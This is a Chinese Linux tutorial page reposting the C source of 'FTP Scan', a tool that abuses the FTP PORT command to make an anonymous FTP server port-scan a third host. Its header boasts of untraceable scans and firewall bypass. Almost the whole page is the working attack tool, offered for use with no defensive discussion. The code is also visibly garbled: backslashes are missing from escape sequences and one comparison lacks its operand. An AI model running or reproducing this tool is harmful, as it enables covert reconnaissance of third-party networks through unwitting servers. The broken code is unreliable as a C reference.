当前位置:Linux教程 - Ftp服务 - 扫描FTP服务器漏洞

扫描FTP服务器漏洞



        

    /** FTP Scan

    ** Exploits bug in FTP protocol that allows user to connect to arbritary

    * IP address and port.

    ** Features: Untraceable port scans. Bypass firewalls!

    * Example usage:

    * ftp-scan ftp.cdrom.com 127.0.0.1 0 1024

    ** This will scan IP 127.0.0.1 from ftp.cdrom.com from port 0 to 1024

    */

    #include <stdio.h>

    #include <stdlib.h>

    #include <sys/param.h>

    #include <sys/socket.h>

    #include <netinet/in.h>

    #include <netdb.h>

    #include <stdarg.h>

    int sock;

    char line[1024];

    void rconnect(char *server)

    {

    struct sockaddr_in sin;

    struct hostent *hp;

    hp = gethostbyname(server);

    if (hp==NULL) {

    printf("Unknown host: %sn",server);

    exit(0);

    }

    bzero((char*) &sin, sizeof(sin));

    bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length);

    sin.sin_family = hp->h_addrtype;

    sin.sin_port = htons(21);

    sock = socket(AF_INET, SOCK_STREAM, 0);

    connect(sock,(struct sockaddr *) &sin, sizeof(sin));

    }

     

    void login(void)

    {

    char buf[1024];

     

    sprintf(buf,"USER ftpn");

    send(sock, buf, strlen(buf),0);

    sleep(1);

    sprintf(buf,"PASS user@n");

    send(sock, buf, strlen(buf),0);

    }

     

    void readln(void)

    {

    int i,done=0,w;

    char tmp[1];

     

    sprintf(line,"");

    i = 0;

    while (!done) {

    w=read(sock,tmp, 1, 0);

    if (tmp[0] != 0) {

    line[i] = tmp[0];

    }

    if (line[i] == ) {

    done = 1;

    }

    i++;

    }

    line[i] = 0;

    }

     

    void sendln(char s[1024]) {

    send(sock, s, strlen(s),0);

    }

     

    #define UC(b) (((int)b)&0xff)

     

    void main(int argc, char **argv)

    {

    char buf[1024];

    int i;

    u_short sport,eport;

    register char *p,*a;

    struct hostent *hp;

    struct sockaddr_in sin;

    char adr[1024];

     

    if (argc != 5) {

    printf("usage: ftp-scan ftp_server scan_host loport hiportn");

    exit(-1);

    }

    hp = gethostbyname(argv[2]);

    if (hp==NULL) {

    printf("Unknown host: %sn",argv[2]);

    exit(0);

    }

    bzero((char*) &sin, sizeof(sin));

    bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length);

    rconnect(argv[1]);

    /* Login anon to server */

    login();

    /* Make sure we are in */

    for (i=0; i<200; i++) {

    readln();

    if (strstr(line,"230 Guest")) {

    printf("%s",line);

    i = 200;

    }

    }

    a=(char *)&sin.sin_addr;

    sport = atoi(argv[3]);

    eport = atoi(argv[4]);

    sprintf(adr,"%i,%i,%i,%i",UC(a[0]),UC(a[1]),UC(a[2]),UC(a[3]));

    for (i=sport; i<eport; i++) {

    sin.sin_port = htons(i);

    p=(char *)&sin.sin_port;

    sprintf(buf,"nPORT %s,%i,%inLISTn",adr,UC(p[0]),UC(p[1]));

    sendln(buf);

    sprintf(line,"");

    while (!strstr(line, "150") && !strstr(line,"425")) {

    readln();

    }

    if (strstr(line,"150")) {

    printf("%i connected.n",i);

    }

    }

    close(sock);

    }


    发布人:netbull 来自:奥索网络